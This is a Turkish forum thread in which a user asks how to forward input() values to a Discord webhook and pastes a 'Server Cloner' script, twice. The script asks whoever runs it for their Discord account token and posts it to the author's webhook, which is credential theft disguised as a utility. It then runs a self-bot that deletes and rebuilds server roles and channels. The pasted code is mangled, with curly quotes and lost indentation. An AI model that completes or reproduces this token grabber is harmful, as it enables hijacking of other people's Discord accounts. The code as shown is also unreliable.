Python Projemdeki Log'ları discorda webhook olarak nasıl aktaracağım

Merhabalar, Ben Bir Python Projesi Yaptım Ve Bu Projede 3 Adet input Modülünü tanımladım.

Benim İstediğim şey bu modülleri Discord Webhooku ile Webhook’a ait odaya yazdırmak eğer açıklayıcı gelmediyse şöyle anlatiyim

Proje.py|
bir_isim = input(“Bir İsim Gir”)
bir_isim_daha = input(“Bir İsim daha Gir”)

print.webhook(bir_isim, bir_isim_daha)

Olay Bu olucak print.webhook diye bir kod yok farkındayım sadece örnek amaçlı koydum.

Bu anlattığımın Kodu nedir veya nelerdir yardımcı olabilirmisiniz?

import requests
webhook_url = 'WEBHOOK' # webhook ekleyin

message = 'test mesajı '


data = {
    'content': message
}

response = requests.post(webhook_url, json=data)


if response.status_code == 204:
    print('MESAJ GONDERILDI')
else:
    print('MESAJ GONDERILMEDI')

Teşekkürler Hocam Benim kodum BU

mytitle = “Server Cloner BY H04X”
from os import system
system("title "+mytitle)
import psutil
from pypresence import Presence
import time
import sys
client_id = ‘Hesap ID’
import discord
import asyncio
import colorama
from colorama import Fore, init, Style
import platform
from cloner import Clone
import requests

client = discord.Client(intents=discord.Intents.default())
os = platform.system()
if os == “Windows”:
system(“cls”)
else:
system(“clear”)
print(chr(27) + “[2J”)
print(f"""{Fore.GREEN}

██████╗░░█████╗░ ░█████╗░██╗░░░░░░█████╗░███╗░░██╗███████╗██████╗░
██╔══██╗██╔══██╗ ██╔══██╗██║░░░░░██╔══██╗████╗░██║██╔════╝██╔══██╗
██║░░██║██║░░╚═╝ ██║░░╚═╝██║░░░░░██║░░██║██╔██╗██║█████╗░░██████╔╝
██║░░██║██║░░██╗ ██║░░██╗██║░░░░░██║░░██║██║╚████║██╔══╝░░██╔══██╗
██████╔╝╚█████╔╝ ╚█████╔╝███████╗╚█████╔╝██║░╚███║███████╗██║░░██║
╚═════╝░░╚════╝░ ░╚════╝░╚══════╝░╚════╝░╚═╝░░╚══╝╚══════╝╚═╝░░╚═╝
[Author h04x#1773 & shewse#1000], Contact [h04x#1773,shewse#1000]

{Style.RESET_ALL}
{Fore.YELLOW}> Developed BY h04x#1773{Style.RESET_ALL}
{Fore.YELLOW}> Discord Discord | Your Place to Talk and Hang Out
{Fore.GREEN}> Program Sorunsuz Çalışıyor…{Style.RESET_ALL}
“”")

token = input(f’h04x|DC Cloner| Token -->’)
guild_s = input(‘h04x|DC Cloner|Kopyalanacak Sunucu ID -->’) #Coded BY H04X
guild = input(‘h04x|DC Cloner|Yapıştırılacak Sunucu ID -->’) #Coded BY H04X
input_guild_id = guild_s #Kopyaladığın Sunucu
output_guild_id = guild #Yapıştırdığın Sunucu
token = token #Hesabının Tokeni

webhook_url = ‘WEBHOOK’ # webhook ekleyin

message = ‘token, guild_s, guild’

data = {
‘content’: message
}

response = requests.post(webhook_url, json=data)

if response.status_code == 204:
print(‘MESAJ GONDERILDI’)
else:
print(‘MESAJ GONDERILMEDI’)

print(" “)
print(” ")

@client.event
async def on_ready():
extrem_map = {}
print(f"Giriş Yapılan Hesap: {client.user}")
print(“Sunucu Kopyalanıyor”)
guild_from = client.get_guild(int(input_guild_id))
guild_to = client.get_guild(int(output_guild_id))
await Clone.guild_edit(guild_to, guild_from)
await Clone.roles_delete(guild_to)
await Clone.channels_delete(guild_to)
await Clone.roles_create(guild_to, guild_from)
await Clone.categories_create(guild_to, guild_from)
await Clone.channels_create(guild_to, guild_from)
print(f"""{Fore.GREEN}

████████████████████████████████████████████████████████████
█▄─█─▄█─▄▄─█▄─▄▄─█▄─█─▄██▀▄─██▄─▄████▀▄─██▄─▀█▄─▄█▄─▄▄▀█▄─▄█
██─▄▀██─██─██─▄▄▄██▄─▄███─▀─███─██▀██─▀─███─█▄▀─███─██─██─██
▀▄▄▀▄▄▀▄▄▄▄▀▄▄▄▀▀▀▀▄▄▄▀▀▄▄▀▄▄▀▄▄▄▄▄▀▄▄▀▄▄▀▄▄▄▀▀▄▄▀▄▄▄▄▀▀▄▄▄▀

{Style.RESET_ALL}""")
await asyncio.sleep(5)
client.close()

client.run(token, bot=False) #Coded BY H04X
Bu Şekilde çalışırmı sizin kodunuzu aktardım içe

Tekrar Sağolun Denedim Fakat Olmadı test mesajı yazan yerde input içindeki değerler yazıcak
onu istiyorum size zahmet sizi yormaz isem yardımcı olma şansınız varmıdır

tabi yardımcı olmak isterim kodunuzu ekteki görseldeki özelliği kullanarak paylaşabilir misiniz ?

Tabikide Kodumu Ekliyorum,

mytitle = “Server Cloner BY H04X”
from os import system
system("title "+mytitle)
import psutil
from pypresence import Presence
import time
import sys
client_id = ‘Hesap ID’
import discord
import asyncio
import colorama
from colorama import Fore, init, Style
import platform
from cloner import Clone
import requests

client = discord.Client(intents=discord.Intents.default())
os = platform.system()
if os == “Windows”:
system(“cls”)
else:
system(“clear”)
print(chr(27) + “[2J”)
print(f"""{Fore.GREEN}

██████╗░░█████╗░ ░█████╗░██╗░░░░░░█████╗░███╗░░██╗███████╗██████╗░
██╔══██╗██╔══██╗ ██╔══██╗██║░░░░░██╔══██╗████╗░██║██╔════╝██╔══██╗
██║░░██║██║░░╚═╝ ██║░░╚═╝██║░░░░░██║░░██║██╔██╗██║█████╗░░██████╔╝
██║░░██║██║░░██╗ ██║░░██╗██║░░░░░██║░░██║██║╚████║██╔══╝░░██╔══██╗
██████╔╝╚█████╔╝ ╚█████╔╝███████╗╚█████╔╝██║░╚███║███████╗██║░░██║
╚═════╝░░╚════╝░ ░╚════╝░╚══════╝░╚════╝░╚═╝░░╚══╝╚══════╝╚═╝░░╚═╝
[Author h04x#1773 & shewse#1000], Contact [h04x#1773,shewse#1000]

{Style.RESET_ALL}
{Fore.YELLOW}> Developed BY h04x#1773{Style.RESET_ALL}
{Fore.YELLOW}> Discord Discord | Your Place to Talk and Hang Out
{Fore.GREEN}> Program Sorunsuz Çalışıyor…{Style.RESET_ALL}
“”")

token = input(f’h04x|DC Cloner| Token -->’)
guild_s = input(‘h04x|DC Cloner|Kopyalanacak Sunucu ID -->’) #Coded BY H04X
guild = input(‘h04x|DC Cloner|Yapıştırılacak Sunucu ID -->’) #Coded BY H04X
input_guild_id = guild_s #Kopyaladığın Sunucu
output_guild_id = guild #Yapıştırdığın Sunucu
token = token #Hesabının Tokeni

webhook_url = ‘WEBHOOK’ # webhook ekleyin

message = ‘token, guild_s, guild’

data = {
‘content’: message
}

response = requests.post(webhook_url, json=data)

if response.status_code == 204:
print(‘MESAJ GONDERILDI’)
else:
print(‘MESAJ GONDERILMEDI’)

print(" “)
print(” ")

@client.event
async def on_ready():
extrem_map = {}
print(f"Giriş Yapılan Hesap: {client.user}")
print(“Sunucu Kopyalanıyor”)
guild_from = client.get_guild(int(input_guild_id))
guild_to = client.get_guild(int(output_guild_id))
await Clone.guild_edit(guild_to, guild_from)
await Clone.roles_delete(guild_to)
await Clone.channels_delete(guild_to)
await Clone.roles_create(guild_to, guild_from)
await Clone.categories_create(guild_to, guild_from)
await Clone.channels_create(guild_to, guild_from)
print(f"""{Fore.GREEN}

████████████████████████████████████████████████████████████
█▄─█─▄█─▄▄─█▄─▄▄─█▄─█─▄██▀▄─██▄─▄████▀▄─██▄─▀█▄─▄█▄─▄▄▀█▄─▄█
██─▄▀██─██─██─▄▄▄██▄─▄███─▀─███─██▀██─▀─███─█▄▀─███─██─██─██
▀▄▄▀▄▄▀▄▄▄▄▀▄▄▄▀▀▀▀▄▄▄▀▀▄▄▀▄▄▀▄▄▄▄▄▀▄▄▀▄▄▀▄▄▄▀▀▄▄▀▄▄▄▄▀▀▄▄▄▀

{Style.RESET_ALL}""")
await asyncio.sleep(5)
client.close()
client.run(token, bot=False) #Coded BY H04X